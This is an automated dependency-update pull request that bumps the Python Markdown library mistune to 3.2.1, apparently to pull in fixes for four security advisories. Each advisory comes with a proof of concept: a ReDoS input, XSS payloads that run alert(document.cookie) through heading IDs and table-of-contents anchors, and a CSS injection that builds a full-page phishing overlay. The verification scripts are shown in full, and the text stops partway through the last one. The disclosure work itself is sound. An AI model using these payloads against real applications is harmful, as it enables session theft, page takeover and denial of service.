chore(deps): update dependency mistune to v3.2.1 [security] by renovate[bot] · Pull Request #642 · cognitedata/pygen

renovate · 2026-05-08T07:03:32Z

This PR contains the following updates:

Package	Change	Age	Confidence
mistune	`==3.2.0` → `==3.2.1`

Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input

CVE-2026-33079 / GHSA-8mp2-v27r-99xp

More information

Details

Summary

A ReDoS (Regular Expression Denial of Service) vulnerability in LINK_TITLE_RE allows an attacker who can supply Markdown for parsing to cause denial of service. A crafted 58-byte Markdown document blocks the parser for approximately 6 seconds (measured on Apple M2, Python 3.14.3), with exponential growth per additional byte pair.

Details

The vulnerable regex is defined in src/mistune/helpers.py#L20-L25:

LINK_TITLE_RE = re.compile(
    r"[ \t\n]+("
    r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"|'  # "title"
    r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'"   # 'title'
    r")"
)

The double-quote branch compiles to "(?:\\[PUNCTUATION]|[^"\x00])*". The two alternatives inside (A|B)* overlap: a backslash followed by a punctuation character (e.g. \!) can be matched by either branch — as a 2-character escaped-punctuation sequence \\!, or as two individual [^"\x00] characters (\ then !). The same ambiguity exists in the single-quoted title branch.

When the input contains repeated \! pairs with no closing ", the regex engine exhaustively backtracks through all 2^N combinations, resulting in exponential O(2^N) time complexity.
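To make the 2^N figure concrete, the sketch below counts how many distinct ways the two alternatives can carve up a run of \! pairs. It is a hand-written model of the alternation, not mistune code: count_decompositions and its allow_backslash_in_catch_all flag are hypothetical names, and string.punctuation stands in for the PUNCTUATION class as an assumption.

```python
import string
from functools import lru_cache


def count_decompositions(body: str, allow_backslash_in_catch_all: bool = True) -> int:
    """Count the ways (A|B)* can consume `body` in full.

    A models the escaped-punctuation branch (backslash + punctuation char).
    B models the catch-all branch (any single char except '"' and NUL).
    """
    excluded = '"\x00' if allow_backslash_in_catch_all else '"\x00\\'

    @lru_cache(maxsize=None)
    def ways(i: int) -> int:
        if i == len(body):
            return 1
        total = 0
        # Branch A: consume "\" plus one punctuation character as a unit.
        if body[i] == "\\" and i + 1 < len(body) and body[i + 1] in string.punctuation:
            total += ways(i + 2)
        # Branch B: consume a single character from the catch-all class.
        if body[i] not in excluded:
            total += ways(i + 1)
        return total

    return ways(0)


for n in (5, 10, 25):
    run = "\\!" * n
    # Second column: overlapping branches; third column: backslash excluded from B.
    print(n, count_decompositions(run), count_decompositions(run, False))
```

With the overlap in place the count doubles for every extra pair; once the catch-all branch can no longer take a backslash, only one decomposition remains.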

This is reachable through normal Markdown parsing via two code paths:

Inline links: [text](url "PAYLOAD) → parse_link() → parse_link_title()
Block link reference definitions: [label]: url "PAYLOAD → BlockParser.parse_ref_link() → parse_link_title() at block_parser.py#L259

PoC

import mistune
import time

md = mistune.create_markdown()

# Test with increasing N (number of \! pairs)
for n in [15, 18, 20, 22, 25]:
    payload = '[x](y "' + '\\!' * n + ')'
    start = time.time()
    md(payload)
    elapsed = time.time() - start
    print(f"N={n:2d}  len={len(payload):3d} bytes  time={elapsed:.3f}s")

Output (Apple M2, Python 3.14.3, mistune 3.2.0):

N=15  len= 38 bytes  time=0.007s
N=18  len= 44 bytes  time=0.044s
N=20  len= 48 bytes  time=0.178s
N=22  len= 52 bytes  time=0.740s
N=25  len= 58 bytes  time=5.922s

Each increment of N roughly doubles the execution time (consistent with O(2^N)).
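The doubling claim can be checked against the reported timings directly. The sketch below takes the numbers from the PoC output above and computes the geometric-mean growth per extra pair; per_step_factor is a hypothetical helper name introduced only for this illustration.

```python
# Timings copied from the PoC output above (N -> seconds).
timings = {15: 0.007, 18: 0.044, 20: 0.178, 22: 0.740, 25: 5.922}


def per_step_factor(n_low: int, n_high: int) -> float:
    """Geometric-mean growth in run time per unit increase of N."""
    ratio = timings[n_high] / timings[n_low]
    return ratio ** (1 / (n_high - n_low))


print(f"N=15..25: x{per_step_factor(15, 25):.2f} per extra pair")
print(f"N=22..25: x{per_step_factor(22, 25):.2f} per extra pair")
```

Both factors come out close to 2, which is what an O(2^N) search would predict. The smallest timings are near the timer's resolution, so the low end of the range is the least reliable.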

The same attack works via block link reference definitions:

payload = '[l]: u "' + '\\!' * 25  # 58 bytes, ~6 seconds
md(payload)

Impact

This is a denial of service vulnerability. Any application or service that parses user-supplied Markdown using mistune can be made unresponsive by an attacker submitting a small crafted input (under 100 bytes).

Affected use cases include:

Web applications with Markdown-enabled input fields (comments, posts, descriptions)
Documentation systems that accept user contributions
API endpoints that process Markdown
Jupyter tooling such as nbconvert that relies on mistune for rendering

Suggested Fix

Exclude the backslash character from the catch-all character class to eliminate the alternation overlap:

# Before (vulnerable):
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'"

# After (fixed):
r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\\\x00])*'"

This ensures a backslash can only be consumed by the escaped-punctuation branch, eliminating the ambiguity in both the double-quote and single-quote branches. Verified on mistune 3.2.0 (Apple M2, Python 3.14.3):

Reduces N=25 from 4.2 seconds to 0.000006 seconds (700,000x improvement)
Handles N=50 in 0.000008 seconds
Passes all existing functional tests (quoted titles, escaped quotes, escaped punctuation)
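The effect of the change can also be exercised without mistune installed. The following is a minimal sketch that rebuilds only the double-quote branch; the PUNCTUATION definition here is an assumption (a character class built from string.punctuation), and VULNERABLE and FIXED are names chosen for this example rather than identifiers from the library.

```python
import re
import string

# Assumption: a stand-in for mistune's PUNCTUATION character class.
PUNCTUATION = "[" + re.escape(string.punctuation) + "]"

# Double-quote branch only, before and after the suggested change.
VULNERABLE = re.compile(r'[ \t\n]+("(?:\\' + PUNCTUATION + r'|[^"\x00])*")')
FIXED = re.compile(r'[ \t\n]+("(?:\\' + PUNCTUATION + r'|[^"\\\x00])*")')

# Well-formed titles, including an escaped quote, match identically.
for title in (' "plain title"', ' "with \\" escaped quote"', ' "bang\\!"'):
    assert VULNERABLE.match(title).group(1) == FIXED.match(title).group(1)

# An unterminated run of \! pairs is rejected by both patterns. The fixed
# pattern has only one way to consume each pair, so it fails without the
# exponential search. N is kept small so the vulnerable pattern stays fast.
unterminated = ' "' + "\\!" * 12
assert VULNERABLE.match(unterminated) is None
assert FIXED.match(unterminated) is None

# Behavioural difference in this sketch: a backslash followed by a
# non-punctuation character can no longer be consumed by either branch.
assert VULNERABLE.match(' "a\\b"') is not None
assert FIXED.match(' "a\\b"') is None
```

The last two assertions are worth keeping in mind when adapting the pattern: titles that contain a bare backslash before a letter stop matching under the fixed expression as written here, so an application relying on such titles would want a test for that case.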

Severity

CVSS Score: 8.7 / 10 (High)
Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Mistune Heading ID Attribute has Injection XSS

CVE-2026-44897 / GHSA-v87v-83h2-53w7

More information

Details

Summary

HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.

The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like #installation or #getting-started — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.

Details

File: src/mistune/renderers/html.py

def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'    # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"

The text body (line content) is escaped upstream by the inline token renderer, which is why quotes in text arrive as &quot; and similar entities. But _id arrives as a raw string directly from whatever the heading_id callback returned, and no escaping occurs at any point in the pipeline.
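One way to close this gap is to escape the id at the point where it enters the attribute. The sketch below is a standalone illustration using the standard library's html.escape, not the upstream patch; render_heading is a hypothetical function that mirrors the shape of the excerpt above.

```python
import html
from typing import Optional


def render_heading(text: str, level: int, heading_id: Optional[str] = None) -> str:
    """Build an <hN> element, escaping the id before it enters the attribute."""
    tag = "h" + str(level)
    out = "<" + tag
    if heading_id:
        # quote=True also converts " and ' so the value cannot close the attribute.
        out += ' id="' + html.escape(heading_id, quote=True) + '"'
    # `text` is assumed to be already-escaped inline HTML, as in the excerpt above.
    return out + ">" + text + "</" + tag + ">\n"


print(render_heading("Title", 2, 'foo" onmouseover="alert(1)" x="'))
```

The injected quotes come out as &quot; inside a single id value, so no extra attribute is created.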

PoC

Step 1 — Establish the baseline (safe default IDs)

The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)          # default: heading_id produces toc_1, toc_2, …

bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)

Output — ID is auto-generated, no user text appears in it:

<h2 id="toc_1">Introduction</h2>

Step 2 — Add the realistic trigger: a text-based heading_id callback

Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:

def raw_id(token, index):
    return token.get("text", "")   # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

Step 3 — Craft the exploit payload

Construct a heading whose text contains a double-quote followed by an injected attribute:


## foo" onmouseover="alert(document.cookie)" x="

When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.

Step 4 — Observe attribute breakout in the output

ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)

Actual output:

<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>

Note: the heading body text is correctly escaped (&quot;), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.
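Applications that cannot upgrade immediately can reduce exposure by making the callback itself return only harmless characters. The sketch below is one possible slug function under that assumption: slug_id and its "section-" fallback are hypothetical, it keeps only ASCII letters and digits (so non-ASCII headings collapse to the fallback), and it does not de-duplicate repeated headings.

```python
import re


def slug_id(token, index):
    """heading_id-style callback that only ever returns [a-z0-9-] characters."""
    text = token.get("text", "")
    slug = re.sub(r"[^a-z0-9]+", "-", text.lower()).strip("-")
    # Hypothetical fallback for headings with no usable characters.
    return slug or "section-" + str(index)


payload = {"text": 'foo" onmouseover="alert(document.cookie)" x="'}
print(slug_id(payload, 0))
```

It takes the same (token, index) arguments as raw_id in Step 2, so it would be registered the same way, with add_toc_hook(md_vuln, heading_id=slug_id).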

Script

A verification script was created to confirm this issue. It creates an HTML page showing the bypass rendering in the browser.

#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook

def raw_id(token, index):
    return token.get("text", "")

# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h2.md"
bl_src  = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)

print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h2.md"
ex_src  = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)

print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit  .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit",  "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h2.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example usage:

python poc.py

Once the script is run, open report_h2.html in the browser and observe the behaviour.

Impact

Dimension	Assessment
Confidentiality	Session cookie / auth token theft via JavaScript execution triggered on mouse interaction
Integrity	DOM manipulation, phishing content injection, forced navigation
Availability	Page freeze or crash available to attacker

Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading_id callback without independently sanitising the returned value.

Severity

CVSS Score: 6.1 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


Mistune TOC Anchor Injection XSS

CVE-2026-44898 / GHSA-6269-cqxg-mhhv

More information

Details

Summary

render_toc_ul() builds a <ul> table-of-contents tree from a list of (level, id, text) tuples. Both the id value (used as href="#<id>") and the text value (used as the visible link label) are inserted into <a> tags via a plain Python format string — with no HTML escaping applied to either value.

When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the href="#..." attribute context, injecting arbitrary HTML tags including <script> blocks directly into the rendered TOC.

This vulnerability is closely related to H2 (unescaped id= in heading()): the same heading_id callback pattern that triggers H2 also populates the toc_items list that render_toc_ul() consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup.

Details

File: src/mistune/toc.py

def render_toc_ul(toc):
    ...
    for level, k, text in toc:
        # k   = heading id  (used verbatim as href fragment)
        # text = heading text (used verbatim as link label)
        item = '<a href="#{}">{}</a>'.format(k, text)
        # Neither k nor text is passed through escape() at any point

The k and text values come directly from the toc_items list accumulated during parsing. If k contains " or >, the href attribute is broken. If text contains <, raw tags are injected as the visible link content.

PoC

Step 1 — Establish the baseline (safe default IDs)

The script creates a parser with escape=True and the default add_toc_hook() (no custom callback). The default hook assigns sequential numeric IDs that never contain user text:

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_src = "# Introduction\n\n## Installation\n"
_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))

Output — clean, safe TOC:

<ul>
<li><a href="#toc_1">Introduction</a>
<ul>
<li><a href="#toc_2">Installation</a></li>
</ul>
</li>
</ul>

Step 2 — Enable the vulnerable heading_id callback

Register a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators:

def raw_id(token, index):
    return token.get("text", "")

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

Step 3 — Craft the exploit payload

Construct a heading whose text terminates the href="#..." attribute and injects a <script> block followed by a dangling <a href=" to absorb the closing "> that render_toc_ul appends:


## x"><script>alert(document.cookie)</script><a href="

When raw_id processes this heading, it returns the entire text as the ID: x"><script>alert(document.cookie)</script><a href=".

Step 4 — Observe script injection in the TOC output

ex_src = '## x"><script>alert(document.cookie)</script><a href="\n'
_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))

render_toc_ul() formats the malicious ID directly into the <a href>:

'<a href="#{}">{}</a>'.format(k, text)

# becomes:
'<a href="#x"><script>alert(document.cookie)</script><a href="">...</a>'

Actual output:

<ul>
<li><a href="#x"><script>alert(document.cookie)</script><a href="">x&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;a href=&quot;</a></li>
</ul>

The <script> block is live in the document. Note that the anchor label (text) is escaped correctly by mistune's inline renderer before it reaches toc_items, but k (the heading ID) is not escaped anywhere.
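Since the label is already escaped and only the id is raw, a targeted mitigation is to escape the href fragment alone. The sketch below shows that idea with html.escape; toc_link is a hypothetical helper for illustration and is not the change shipped in v3.2.1.

```python
import html


def toc_link(heading_id: str, label_html: str) -> str:
    """Format one TOC anchor, escaping only the href fragment.

    label_html is assumed to be already escaped by the inline renderer,
    so escaping it again here would double-encode entities.
    """
    return '<a href="#{}">{}</a>'.format(html.escape(heading_id, quote=True), label_html)


malicious_id = 'x"><script>alert(document.cookie)</script><a href="'
print(toc_link(malicious_id, "label"))
```

The payload stays inside the href value as inert entity text, and the anchor keeps its single opening and closing tag.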

Script

I have built a script that you can use to verify this. It creates an HTML page showing the bypass so that you can see it render in the browser.

#!/usr/bin/env python3
"""H4: render_toc_ul() puts raw heading ID into <a href> without escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook, render_toc_ul

def raw_id(token, index):
    return token.get("text", "")

# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h4.md"
bl_src  = "# Introduction\n\n## Installation\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))

print(f"[{bl_file}]\n{bl_src}")
print("[toc output — safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h4.md"
ex_src  = '## x"><script>alert(document.cookie)</script><a href="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))

print(f"[{ex_file}]\n{ex_src}")
print("[toc output — script injected via href breakout]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit  .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>TOC output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H4 — TOC XSS</title><style>{CSS}</style></head><body>
<h1>H4 — TOC render_toc_ul() XSS</h1>
<p class="desc">render_toc_ul() in toc.py uses '&lt;a href="#{{}}"&gt;{{}}&lt;/a&gt;'.format(k, text) —
neither k (the heading ID) nor text is escaped before insertion.</p>
{case("baseline", "Normal headings → sequential IDs → clean TOC links", bl_file, bl_src, bl_out)}
{case("exploit",  "Malicious heading ID breaks out of href='#...' → script injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h4.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example usage:

python poc.py

Once you run the script, open report_h4.html in the browser and observe the behaviour.

Impact

Dimension	Assessment
Confidentiality	JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page's origin
Integrity	Arbitrary DOM manipulation, phishing form injection, forced redirects
Availability	Page crash or freeze available as secondary effect

Risk context: TOC generation is a rendering step that often happens in a different template layer from the main body render, potentially reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor.

Severity

CVSS Score: 6.1 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


Mistune Image Directive CSS Injection Vulnerability

CVE-2026-44899 / GHSA-ccfx-mfmx-2fx9

More information

Details

Summary

The Image directive plugin validates the :width: and :height: options with a regex compiled as _num_re = re.compile(r"^\d+(?:\.\d*)?"). This pattern is applied via re.match() (which anchors only at the start of the string, not the end). Any value that begins with one or more digits passes validation, regardless of what follows.

When the validated value is not a plain integer, render_block_image() inserts it directly into a style="width:...;" or style="height:...;" attribute. Because the value was accepted by the prefix-only regex, any CSS after the leading digits reaches the style= attribute verbatim and without escaping.

An attacker can therefore inject an arbitrary chain of CSS properties — including position:fixed, background-color, z-index, outline, and opacity — using nothing more than a single :width: option in a fenced image directive. The resulting element can visually cover the entire browser viewport, enabling full-page phishing overlays and UI redressing attacks.

Details

File: src/mistune/directives/image.py

_num_re = re.compile(r"^\d+(?:\.\d*)?")   # no $ anchor — prefix match only

def _parse_attrs(options):
    height = options.get("height")
    width  = options.get("width")
    if height and _num_re.match(height):   # passes if value STARTS with a digit
        attrs["height"] = height           # full value stored, not just digits
    if width and _num_re.match(width):     # same — prefix-only check
        attrs["width"] = width

And in render_block_image():

if width:
    if width.isdigit():
        img += ' width="' + width + '"'   # safe: integer → HTML attribute
    else:
        style += "width:" + width + ";"   # UNSAFE: non-integer → raw style value

The isdigit() branch correctly uses an HTML attribute for plain integers. The else branch assumes that anything that passed _num_re.match() is a safe CSS length like 100px or 50%. However, because the regex is prefix-only, 100vw;height:100vh;position:fixed;... also passes, and the entire string lands in style= unmodified.
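The difference between a prefix check and a whole-string check is easy to see side by side. In the sketch below, PREFIX_RE is the pattern quoted in the advisory, while STRICT_RE and is_safe_dimension are hypothetical: the unit allow-list is an assumption made for illustration and is not taken from the v3.2.1 change.

```python
import re

# Prefix-only pattern quoted in the advisory.
PREFIX_RE = re.compile(r"^\d+(?:\.\d*)?")

# Hypothetical stricter pattern: a number plus an optional unit from a short
# allow-list, checked against the whole string with fullmatch().
STRICT_RE = re.compile(r"\d+(?:\.\d+)?(?:px|em|rem|%|vw|vh)?")


def is_safe_dimension(value: str) -> bool:
    """Return True only if the entire value is a number with an allowed unit."""
    return STRICT_RE.fullmatch(value) is not None


attack = "100vw;height:100vh;position:fixed"
# First value: prefix check accepts the attack; second: strict check rejects it.
print(bool(PREFIX_RE.match(attack)), is_safe_dimension(attack))

for ok in ("400", "100px", "50%", "12.5em"):
    assert is_safe_dimension(ok)
```

Using fullmatch() rather than appending $ to the pattern is a deliberate choice in this sketch: in Python, $ also matches just before a trailing newline, whereas fullmatch() requires the whole string to be consumed.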

PoC

Step 1 — Establish the baseline (safe plain-integer dimensions)

The script creates a parser with escape=True, FencedDirective, and the Image plugin. A safe image directive is rendered with integer width and height:

md = create_markdown(escape=True, plugins=[FencedDirective([Image()])])

bl_src = (
    "```{image} photo.jpg\n"
    ":width: 400\n"
    ":height: 300\n"
    ":alt: safe image\n"
    "```\n"
)
bl_out = str(md(bl_src))

Expected and actual output — clean width= and height= HTML attributes, no style=:

<div class="block-image"><img src="photo.jpg" alt="safe image" width="400" height="300" /></div>

Step 2 — Understand why non-integer widths go into style=

When width is not a plain integer (e.g., 100px), width.isdigit() returns False, so the render path falls through to style += "width:" + width + ";". This is the intended mechanism for CSS-unit dimensions. The flaw is that _num_re.match() lets far more than CSS units through.

Step 3 — Craft the exploit payload

Provide a :width: value that begins with a valid number (satisfying _num_re.match()) but appends an entire CSS attack chain after it:

:width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93

100vw — starts with 1, passes _num_re.match(); also sets the width to full viewport width
;height:100vh — overrides height to full viewport height
;position:fixed — lifts element out of document flow, fixed to the browser viewport
;top:0;left:0 — anchors overlay to the top-left corner
;z-index:9999 — places it above all other page content
;background-color:#e11d48 — fills the overlay with vivid crimson
;outline:8px solid #facc15 — adds a bright yellow border
;color:#fff;opacity:.93 — styles the alt-text label in white with near-full opacity

Full exploit markdown:

```{image} x.jpg
:width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93
:alt: ⚠ CSS INJECTED — click to dismiss ⚠
```

Step 4 — Observe the injected style= in the output

ex_src = (
    "```{image} x.jpg\n"
    ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;"
    "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n"
    ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n"
    "```\n"
)
ex_out = str(md(ex_src))

Actual output:

<div class="block-image"><img src="x.jpg" alt="⚠ CSS INJECTED — click to dismiss ⚠" style="width:100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93;" /></div>

Every injected CSS property is present in the style= attribute. When a browser renders this HTML, the <img> element:

expands to fill 100% of the viewport width and height
sits fixed at the top-left corner of the viewport and stays in place as the page scrolls
is coloured crimson with a yellow outline
appears above all other page content

The result is a complete full-page phishing overlay generated from a single Markdown image directive.

Script

I have built a script that you can use to verify this. It creates an HTML page showing the bypass so that you can see it render in the browser.

#!/usr/bin/env python3
"""H6: Image directive CSS injection — width/height use prefix-only re.match().

Exploit combines: position:fixed  +  background-color  +  outline colour
→ a full-viewport coloured overlay injected via a single :width: option.
"""
import os, html as h
from mistune import create_markdown
from mistune.directives import FencedDirective
from mistune.directives.image import Image

md = create_markdown(escape=True, plugins=[FencedDirective([Image()])])

# --- baseline ---
bl_file = "baseline_h6.md"
bl_src  = (
    "```{image} photo.jpg\n"
    ":width: 400\n"
    ":height: 300\n"
    ":alt: safe image\n"
    "```\n"
)
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out = str(md(bl_src))

print(f"[{bl_file}]\n{bl_src}")
print("[output — clean width/height attributes, no style injection]")
print(bl_out)

# --- exploit ---
# _num_re.match() is prefix-only (no $ anchor), so anything after the leading
# digits is accepted and written verbatim into style="width:<value>;".
#
# This single :width: value smuggles a full CSS attack chain:
#   position:fixed  → overlay sits above the entire page
#   top/left/width/height → covers 100 % of the viewport
#   background-color:#e11d48 → vivid crimson fill
#   outline:8px solid #facc15 → bright yellow border
#   color:#fff → white alt-text label
#   z-index:9999 → on top of everything
ex_file = "exploit_h6.md"
ex_src  = (
    "```{image} x.jpg\n"
    ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;"
    "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n"
    ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n"
    "```\n"
)
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out = str(md(ex_src))

print(f"[{ex_file}]\n{ex_src}")
print("[output — colour + background-colour + fixed overlay injected into style=]")
print(ex_out)

# --- HTML report ---
CSS = """
